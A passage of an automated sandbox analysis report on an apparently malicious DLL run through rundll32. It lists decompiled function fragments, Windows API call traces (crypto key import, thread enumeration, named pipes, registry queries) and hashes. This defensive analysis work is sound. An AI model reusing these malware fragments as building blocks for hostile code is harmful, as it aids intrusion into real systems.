                                                            • Part of subcall function 00E56FEA: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 00E57002
                                                            • Part of subcall function 00E515AB: lstrlen.KERNEL32(7519F710,?,00000000,?,7519F710), ref: 00E515DF
                                                            • Part of subcall function 00E515AB: StrStrA.SHLWAPI(00000000,?), ref: 00E515EC
                                                            • Part of subcall function 00E515AB: RtlAllocateHeap.NTDLL(00000000,?), ref: 00E5160B
                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00E577F2), ref: 00E559B9
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$Allocate$Freelstrlen
                                                          • String ID:
                                                          • API String ID: 2220322926-0
                                                          • Opcode ID: 2f772be7b0fe88cceeb44a7dedb9ea3085d0a0290df419d02dc376b759efd87d
                                                          • Instruction ID: c3effbd8ac091e997a78193412cad521fae10f0209f84ece18b6cbcf5fa22d3c
                                                          • Opcode Fuzzy Hash: 2f772be7b0fe88cceeb44a7dedb9ea3085d0a0290df419d02dc376b759efd87d
                                                          • Instruction Fuzzy Hash: 2C016D76200608FFCB16CF45CC51EAA7BE9EB84356F104925FA19A6160E731EA48EB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557CC84, Relevance: 1.5, APIs: 1, Instructions: 15threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 05583AEA: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,0559C140,00000000,0557CC8B,?,0557CD20,?), ref: 05583B09
                                                            • Part of subcall function 05583AEA: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,0559C140,00000000,0557CC8B,?,0557CD20,?), ref: 05583B14
                                                            • Part of subcall function 05583AEA: _wcsupr.NTDLL ref: 05583B21
                                                            • Part of subcall function 05583AEA: lstrlenW.KERNEL32(00000000), ref: 05583B29
                                                          • ResumeThread.KERNEL32(00000004,?,0557CD20,?), ref: 0557CC99
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
                                                          • String ID:
                                                          • API String ID: 3646851950-0
                                                          • Opcode ID: 72e55b0aa7990ccee1b26419e9b8c230f8899fd4dfa50ca1a9ab0aaf3656effe
                                                          • Instruction ID: f242feb5af61cdb17cc7b0f25f7c3f94c913e0a189d2abc7c83430a20bf10c6f
                                                          • Opcode Fuzzy Hash: 72e55b0aa7990ccee1b26419e9b8c230f8899fd4dfa50ca1a9ab0aaf3656effe
                                                          • Instruction Fuzzy Hash: EBD05E30204305EADB216B50EE09B2A7E967F50B84F008865F99690560CB369D24A505
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0559465F, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0559466C
                                                            • Part of subcall function 0559477C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,0002858C,05570000), ref: 055947F5
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ExceptionHelper2@8LoadRaise___delay
                                                          • String ID:
                                                          • API String ID: 123106877-0
                                                          • Opcode ID: c279f0e3086216ce461140bb70faa6708d5d05114f22addccd48f3f9ef3fa7b5
                                                          • Instruction ID: 099f9382945a79453bf8f0ddaeecfffdc2ad5fce7a4c606cfbcd831eb2ff54b2
                                                          • Opcode Fuzzy Hash: c279f0e3086216ce461140bb70faa6708d5d05114f22addccd48f3f9ef3fa7b5
                                                          • Instruction Fuzzy Hash: B7A002E6255145FC3F1C52555D55C37015DF4DA9153744559F4019405095581C475475
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0559467A, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0559466C
                                                            • Part of subcall function 0559477C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,0002858C,05570000), ref: 055947F5
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ExceptionHelper2@8LoadRaise___delay
                                                          • String ID:
                                                          • API String ID: 123106877-0
                                                          • Opcode ID: c66adc8a6fd28b04724ab2ebef1b93c2cf0a6b0472c129f2a6ad575095d88075
                                                          • Instruction ID: 0cc006909524499fe12868382734ab71cc2cb25df6c5f8ad42726cf33e320679
                                                          • Opcode Fuzzy Hash: c66adc8a6fd28b04724ab2ebef1b93c2cf0a6b0472c129f2a6ad575095d88075
                                                          • Instruction Fuzzy Hash: E9A002E6259146FC3F1C52555D55C37015DF4DD9513744959E4018405095581C475475
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05585EA9, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 0add2686fee542ddb79956b11be98b6743e0de9b681ab17d9b15a7e3270ea82f
                                                          • Instruction ID: 1d4eb9b8903098ec7f24e6a00373b974862f2e66f99251cfb0971f5035aebd0d
                                                          • Opcode Fuzzy Hash: 0add2686fee542ddb79956b11be98b6743e0de9b681ab17d9b15a7e3270ea82f
                                                          • Instruction Fuzzy Hash: 02B01231014100EBDA014B01EE07F097F21A750700F034012B204400A08A39146CFF14
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557231D, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000000,?,0557D1F9,?,00000000,751881D0,00000000,?,?,?,055756D1,?,00000000,00000000), ref: 05572329
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: bb87fb7f4a6b3dfe1d2eec2b600e86e1d80d9eebbc42ef01565983e169a415dc
                                                          • Instruction ID: 608caa8e64feef7e5bfd981220d95f10553d3fad51174819a157406da496e503
                                                          • Opcode Fuzzy Hash: bb87fb7f4a6b3dfe1d2eec2b600e86e1d80d9eebbc42ef01565983e169a415dc
                                                          • Instruction Fuzzy Hash: 22B01231014100EBDA114B00EE07F097F21A750700F034412B204400A08A39546CFF04
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E513CC, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00E513CC(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0xe5a290, 0, _a4); // executed
				return _t2;
			}




                                                          0x00e513d8
                                                          0x00e513de

                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000000,00000000,00E520F3,00000000,00000000,?,00000000,?,?,?,?,?,00E568A9,00000000,?,00000001), ref: 00E513D8
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: eb92f13c2560135a4d36eea41ff34b3415314637cf56b270e6599fd789cc9e8f
                                                          • Instruction ID: 034cb901fd48e1a924b91ec9e159000090819e3d1d204dbef17af78cd13eb205
                                                          • Opcode Fuzzy Hash: eb92f13c2560135a4d36eea41ff34b3415314637cf56b270e6599fd789cc9e8f
                                                          • Instruction Fuzzy Hash: B8B01275104300EFCB264B02DE05F057B22B750B02F004C20F308200B082320424FB17
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E55FBC, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00E55FBC(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0xe5a290, 0, _a4); // executed
				return _t2;
			}




                                                          0x00e55fc8
                                                          0x00e55fce

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000,00E52035), ref: 00E55FC8
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 9bcbd1b3a6ba1a03661dea50132423950c7f59aa84dc8ac329a01e5cd56ac96a
                                                          • Instruction ID: 03bd4934036b673b807305557d30392a3e86a8748d76a3956ffb8f351656a542
                                                          • Opcode Fuzzy Hash: 9bcbd1b3a6ba1a03661dea50132423950c7f59aa84dc8ac329a01e5cd56ac96a
                                                          • Instruction Fuzzy Hash: D2B01235014300EFCE164B01DD05F067B32B750B02F104C20B204200B083320424EB06
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05588575, Relevance: 1.3, APIs: 1, Instructions: 63memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 055750C7: RegQueryValueExA.KERNEL32(00000000,055729E6,00000000,055729E6,00000000,?,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?), ref: 055750FF
                                                            • Part of subcall function 055750C7: RtlAllocateHeap.NTDLL(00000000,?), ref: 05575113
                                                            • Part of subcall function 055750C7: RegQueryValueExA.ADVAPI32(00000000,055729E6,00000000,055729E6,00000000,?,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?), ref: 0557512D
                                                            • Part of subcall function 055750C7: RegCloseKey.ADVAPI32(00000000,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?,055729E6,00000000), ref: 05575157
                                                          • HeapFree.KERNEL32(00000000,055729E6,00000000,?,055729E6,00000000,?,?,?,?,?,?,055729E6,00000000), ref: 05588607
                                                            • Part of subcall function 05577BD5: memcpy.NTDLL(?,?,00000000,?,?,?,00000000,?,?,05581FA4,?,00000001,?,00000000,00000001,00000000), ref: 05577BF8
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: HeapQueryValue$AllocateCloseFreememcpy
                                                          • String ID:
                                                          • API String ID: 1301464996-0
                                                          • Opcode ID: 3b163454cb822d7ab547ed6e670e55a444c072fdb16dc377cfe550b6ea097448
                                                          • Instruction ID: a52bc8826e04f7e12ebefc6442fd981fc38d9c0d12ae965bca0a44341e8bba64
                                                          • Opcode Fuzzy Hash: 3b163454cb822d7ab547ed6e670e55a444c072fdb16dc377cfe550b6ea097448
                                                          • Instruction Fuzzy Hash: 9811E071710201FBDB14EB89E8A1EBDBBA9FB48310F41082AF506BB241DB74AD08DB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557E570, Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memcpy.NTDLL(00000000,0559C214,00000018,05573A05,059B8E6E,?,05573A05,059B8E6E,?,05573A05,059B8E6E,?,00000000,00000000,?,05573A05), ref: 0557E625
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memcpy
                                                          • String ID:
                                                          • API String ID: 3510742995-0
                                                          • Opcode ID: 07814b31e5c6120db9eae0252d681acb6160dd34e2dc483a02c1c046bdea41e0
                                                          • Instruction ID: d6b2abbeb68ad4ad5af2492383175caf454822c4bbcc60b6119ed638b05081e9
                                                          • Opcode Fuzzy Hash: 07814b31e5c6120db9eae0252d681acb6160dd34e2dc483a02c1c046bdea41e0
                                                          • Instruction Fuzzy Hash: EC11B172620109AFCF14DFD5F847C65BFADF785250B064123F58A87260EA386D08EB74
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05580C6E, Relevance: 1.3, APIs: 1, Instructions: 50memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 055750C7: RegQueryValueExA.KERNEL32(00000000,055729E6,00000000,055729E6,00000000,?,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?), ref: 055750FF
                                                            • Part of subcall function 055750C7: RtlAllocateHeap.NTDLL(00000000,?), ref: 05575113
                                                            • Part of subcall function 055750C7: RegQueryValueExA.ADVAPI32(00000000,055729E6,00000000,055729E6,00000000,?,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?), ref: 0557512D
                                                            • Part of subcall function 055750C7: RegCloseKey.ADVAPI32(00000000,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?,055729E6,00000000), ref: 05575157
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 05580CDF
                                                            • Part of subcall function 05585DF9: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,05580CCA,00000000,?,00000000,?,?,?,?,?,?), ref: 05585E0B
                                                            • Part of subcall function 05585DF9: StrChrA.SHLWAPI(?,00000020,?,00000000,05580CCA,00000000,?,00000000,?,?,?,?,?,?), ref: 05585E1A
                                                            • Part of subcall function 05591E10: CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 05591E36
                                                            • Part of subcall function 05591E10: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 05591E42
                                                            • Part of subcall function 05591E10: GetModuleHandleA.KERNEL32(?,059B9732,00000000,?,00000000), ref: 05591E62
                                                            • Part of subcall function 05591E10: GetProcAddress.KERNEL32(00000000), ref: 05591E69
                                                            • Part of subcall function 05591E10: Thread32First.KERNEL32(?,0000001C), ref: 05591E79
                                                            • Part of subcall function 05591E10: CloseHandle.KERNEL32(?), ref: 05591EC1
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
                                                          • String ID:
                                                          • API String ID: 2627809124-0
                                                          • Opcode ID: 9905c5908c9a3bff565c1b469f496503df36944c7a4c8b1c788e20fdca7399f3
                                                          • Instruction ID: 4baf706d74932f4a4bec633f1e2f49e922774e13b66868dad9567dcbae9ab812
                                                          • Opcode Fuzzy Hash: 9905c5908c9a3bff565c1b469f496503df36944c7a4c8b1c788e20fdca7399f3
                                                          • Instruction Fuzzy Hash: E9017C71624119FFDB01ABA8ED89CBFBBEDFB45254711015AB401A3110EA35AE09AB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558DA6E, Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 055750C7: RegQueryValueExA.KERNEL32(00000000,055729E6,00000000,055729E6,00000000,?,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?), ref: 055750FF
                                                            • Part of subcall function 055750C7: RtlAllocateHeap.NTDLL(00000000,?), ref: 05575113
                                                            • Part of subcall function 055750C7: RegQueryValueExA.ADVAPI32(00000000,055729E6,00000000,055729E6,00000000,?,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?), ref: 0557512D
                                                            • Part of subcall function 055750C7: RegCloseKey.ADVAPI32(00000000,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?,055729E6,00000000), ref: 05575157
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 0558DAE4
                                                            • Part of subcall function 05585DF9: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,05580CCA,00000000,?,00000000,?,?,?,?,?,?), ref: 05585E0B
                                                            • Part of subcall function 05585DF9: StrChrA.SHLWAPI(?,00000020,?,00000000,05580CCA,00000000,?,00000000,?,?,?,?,?,?), ref: 05585E1A
                                                            • Part of subcall function 05581486: lstrlen.KERNEL32(?,00000000,00000000,75145520,?,?,?,0557D50C,0000001C,00000000,00000000), ref: 055814B6
                                                            • Part of subcall function 05581486: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 055814CC
                                                            • Part of subcall function 05581486: memcpy.NTDLL(00000010,?,00000000,?,?,?,0557D50C,0000001C), ref: 05581502
                                                            • Part of subcall function 05581486: memcpy.NTDLL(00000010,00000000,0557D50C,?,?,?,0557D50C), ref: 0558151D
                                                            • Part of subcall function 05581486: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 0558153B
                                                            • Part of subcall function 05581486: GetLastError.KERNEL32(?,?,?,0557D50C), ref: 05581545
                                                            • Part of subcall function 05581486: HeapFree.KERNEL32(00000000,00000000,?,?,?,0557D50C), ref: 05581568
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
                                                          • String ID:
                                                          • API String ID: 730886825-0
                                                          • Opcode ID: b3ad639a19fb015bdab855cf77da941fd9c658c0894cc942768aaf15de48b63b
                                                          • Instruction ID: f257e174da83964d18e731df54282e91f1fb63b1e5047906b96c5fc724019631
                                                          • Opcode Fuzzy Hash: b3ad639a19fb015bdab855cf77da941fd9c658c0894cc942768aaf15de48b63b
                                                          • Instruction Fuzzy Hash: A9017131624205FBDB21EB54ED0AFAE7BFCFB46754F154056B501B3180DA74AA04EBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E511B0, Relevance: 1.3, APIs: 1, Instructions: 42memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00E511B0(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
				void* _t24;
				signed short _t25;
				signed int _t27;
				intOrPtr* _t28;
				signed short _t29;

				_t28 = __edi;
				if(_a4 == 0) {
					L2:
					_t29 = E00E53B91(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t29 == 0) {
						_t27 = _a12 >> 1;
						if(_t27 == 0) {
							_t29 = 2;
							HeapFree( *0xe5a290, 0, _a4);
						} else {
							_t24 = _a4;
							 *(_t24 + _t27 * 2 - 2) =  *(_t24 + _t27 * 2 - 2) & _t29;
							 *_t28 = _t24;
						}
					}
					L6:
					return _t29;
				}
				_t25 = E00E55ED2(_a4, _a8, _a12, __edi); // executed
				_t29 = _t25;
				if(_t29 == 0) {
					goto L6;
				}
				goto L2;
			}








                                                          0x00e511b0
                                                          0x00e511b8
                                                          0x00e511cf
                                                          0x00e511ea
                                                          0x00e511ee
                                                          0x00e511f3
                                                          0x00e511f5
                                                          0x00e51205
                                                          0x00e51211
                                                          0x00e511f7
                                                          0x00e511f7
                                                          0x00e511fa
                                                          0x00e511ff
                                                          0x00e511ff
                                                          0x00e511f5
                                                          0x00e51217
                                                          0x00e5121b
                                                          0x00e5121b
                                                          0x00e511c4
                                                          0x00e511c9
                                                          0x00e511cd
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 00E55ED2: SysFreeString.OLEAUT32(00000000), ref: 00E55F38
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,7519F710,?,00000000,?,00000000,?,00E55372,?,004F0053,051B9318,00000000,?), ref: 00E51211
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Free$HeapString
                                                          • String ID:
                                                          • API String ID: 3806048269-0
                                                          • Opcode ID: edb787c4bbc7ea7e8975690f312019a59feab1c0dfb41aa340e9752363de9d2d
                                                          • Instruction ID: 1a282f17717c68f739cd2422d068f621411ec158c3feb04484ed78ae0c72e82c
                                                          • Opcode Fuzzy Hash: edb787c4bbc7ea7e8975690f312019a59feab1c0dfb41aa340e9752363de9d2d
                                                          • Instruction Fuzzy Hash: 95014B36040619BBCB229F84CC02FEA3BA5FB44792F049868FE04AA120C731CD64EB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E56E5D, Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 75%
                                                          			E00E56E5D(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E00E53276( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E00E55FBC(_a8 + _a8);
					if(_t21 != 0) {
						E00E561A5(_a4, _t21, _t23);
					}
					E00E513CC(_a4);
				}
				return _t21;
			}





                                                          0x00e56e65
                                                          0x00e56e6c
                                                          0x00e56e6e
                                                          0x00e56e7d
                                                          0x00e56e84
                                                          0x00e56e93
                                                          0x00e56e97
                                                          0x00e56e9e
                                                          0x00e56e9e
                                                          0x00e56ea6
                                                          0x00e56eab
                                                          0x00e56eb0

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000000,00E54A9F,00000000,?,00E571BA,00000000,00E54A9F,?,00000000,00E54A9F,00000000,051B9630), ref: 00E56E6E
                                                            • Part of subcall function 00E53276: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,00E56E82,00000001,00E54A9F,00000000), ref: 00E532AE
                                                            • Part of subcall function 00E53276: memcpy.NTDLL(00E56E82,00E54A9F,00000010,?,?,?,00E56E82,00000001,00E54A9F,00000000,?,00E571BA,00000000,00E54A9F,?,00000000), ref: 00E532C7
                                                            • Part of subcall function 00E53276: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 00E532F0
                                                            • Part of subcall function 00E53276: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 00E53308
                                                            • Part of subcall function 00E53276: memcpy.NTDLL(00000000,00000000,051B9630,00000010), ref: 00E5335A
                                                            • Part of subcall function 00E55FBC: RtlAllocateHeap.NTDLL(00000000,00000000,00E52035), ref: 00E55FC8
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                                                          • String ID:
                                                          • API String ID: 894908221-0
                                                          • Opcode ID: 8ba3162a17671b4e47268fa1ffc444e30a643b03ccbb80c4337ea3c683ea3097
                                                          • Instruction ID: bcc3c19ab844adf677f6caf7f401e34bc8047a8b9a1758269461e46c68de98e5
                                                          • Opcode Fuzzy Hash: 8ba3162a17671b4e47268fa1ffc444e30a643b03ccbb80c4337ea3c683ea3097
                                                          • Instruction Fuzzy Hash: 7EF03A3A101509BADF016E55DC05DEB3BADEF84365B009822BD18EA121DB31DA599BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E5304F, Relevance: 1.3, APIs: 1, Instructions: 26stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00E5304F(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
				void* _t17;

				if(_a4 == 0) {
					L2:
					return E00E565FA(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
				}
				_t17 = E00E55F4F(_a4, _a8, _a12, _a16, _a20); // executed
				if(_t17 != 0) {
					goto L2;
				}
				return _t17;
			}




                                                          0x00e53057
                                                          0x00e53071
                                                          0x00000000
                                                          0x00e5308d
                                                          0x00e53068
                                                          0x00e5306f
                                                          0x00000000
                                                          0x00000000
                                                          0x00e53094

                                                          APIs
                                                          • lstrlenW.KERNEL32(?,?,?,00E55611,3D00E590,80000002,00E5755B,00E53E52,74666F53,4D4C4B48,00E53E52,?,3D00E590,80000002,00E5755B,?), ref: 00E53074
                                                            • Part of subcall function 00E55F4F: SysAllocString.OLEAUT32(00E53E52), ref: 00E55F69
                                                            • Part of subcall function 00E55F4F: SysFreeString.OLEAUT32(00000000), ref: 00E55FA9
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: String$AllocFreelstrlen
                                                          • String ID:
                                                          • API String ID: 3808004451-0
                                                          • Opcode ID: 976589fe2ddce9ac97c1e7cbaa2bcf97b1009f5f42a22dbc846782111f362fc8
                                                          • Instruction ID: 025efc57b9f6761dca959ee7434c7478ba8e6852230fbfb2c03262194a7230da
                                                          • Opcode Fuzzy Hash: 976589fe2ddce9ac97c1e7cbaa2bcf97b1009f5f42a22dbc846782111f362fc8
                                                          • Instruction Fuzzy Hash: A1F0743200020EFFDF165F90DC45D9A3F6AAB04355F048414BE19650A1D732C9B5EBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

